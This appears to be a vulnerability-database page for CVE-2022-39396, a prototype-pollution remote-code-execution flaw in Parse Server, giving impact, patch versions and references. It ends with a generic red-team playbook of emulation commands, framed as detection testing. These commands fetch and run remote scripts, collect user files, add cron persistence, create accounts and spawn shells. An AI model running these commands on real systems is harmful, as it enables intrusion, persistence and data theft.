CVE-2022-39396
Overview
This vulnerability is a prototype pollution flaw in the parse-community parse-server affecting versions prior to 4.10.18 and 5.3.1. The root cause lies in the unsafe handling of object prototypes within the server's codebase, which allows an attacker to manipulate the prototype chain. This manipulation subsequently triggers a vulnerability in the MongoDB BSON parser component used by the server, enabling execution of arbitrary code.
Vulnerability Description
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Versions prior to 4.10.18, and prior to 5.3.1 on the 5.X branch, are vulnerable to Remote Code Execution via prototype pollution. An attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. This issue is patched in version 5.3.1 and in 4.10.18. There are no known workarounds.
Impact
An unauthenticated remote attacker can exploit this vulnerability to achieve remote code execution on the parse-server backend, enabling full control over the server environment. This can lead to data compromise, service disruption, or further lateral movement within the infrastructure. The attack requires only network access to the vulnerable parse-server instance and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. The high confidentiality, integrity, and availability impact scores reflect the critical nature of this flaw.
Solution
Users must upgrade parse-community parse-server to version 4.10.18 or later, or version 5.3.1 or later on the 5.x branch, as detailed in the official GitHub security advisory GHSA-prm5-8g2m-24gg (https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg). No workarounds exist; applying the vendor-provided patches is the only effective remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Parse Server arises from a flaw in the way the application handles prototype pollution, a critical issue that can lead to remote code execution. Prototype pollution occurs when an attacker is able to manipulate an object's prototype, allowing them to inject arbitrary properties into existing objects. In this case, the MongoDB BSON parser is the entry point for exploitation, as it processes user input without adequate validation. This oversight enables an attacker to craft malicious payloads that can modify the behavior of the application, leading to unauthorized code execution on the server. The affected versions of Parse Server, specifically those prior to 4.10.18 and 5.3.1, are particularly vulnerable due to their reliance on this flawed parsing mechanism.
Attack vectors for this vulnerability are varied and can be executed through different means. An attacker could exploit the flaw by sending specially crafted requests to the Parse Server, targeting endpoints that utilize the BSON parser. For instance, by manipulating input fields in API requests, an attacker can inject malicious JavaScript code that the server subsequently executes. This could lead to a range of malicious activities, including data theft, unauthorized access to sensitive information, or even complete system compromise. The ease of exploitation, combined with the high severity of the vulnerability, makes it a significant threat to any organization utilizing affected versions of Parse Server.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on Parse Server for their backend infrastructure. Given the high CVSS score of 9.8, the potential for exploitation is severe, and successful attacks could lead to catastrophic data breaches. Organizations could face significant financial repercussions, including regulatory fines, loss of customer trust, and damage to their brand reputation. Furthermore, the ability to execute arbitrary code on the server could allow attackers to pivot to other systems within the network, escalating their access and increasing the overall risk to the organization.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Parse Server, specifically 5.3.1 or 4.10.18. Regularly updating software components is a fundamental practice in cybersecurity, as it ensures that known vulnerabilities are addressed promptly. Additionally, implementing robust input validation and sanitization measures can help mitigate the risk of prototype pollution attacks. Organizations should also consider employing web application firewalls (WAFs) to monitor and filter incoming traffic for malicious patterns that could indicate an attempted exploitation of this vulnerability. Continuous monitoring and logging of application behavior can further aid in the detection of anomalous activities that may suggest an ongoing attack.
In conclusion, the prototype pollution vulnerability in Parse Server represents a critical security risk that organizations must address to protect their systems and data. The potential for remote code execution through this flaw underscores the importance of maintaining updated software and implementing comprehensive security measures. By understanding the nature of the vulnerability, recognizing the attack vectors, and adopting effective detection and mitigation strategies, organizations can significantly reduce their exposure to this and similar threats in the future.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Parseplatform | Parse-Server | All |
cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
|
|
|
Parseplatform | Parse-Server | All |
cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-39396 |
| github.com |
GitHub CVE
|
https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg |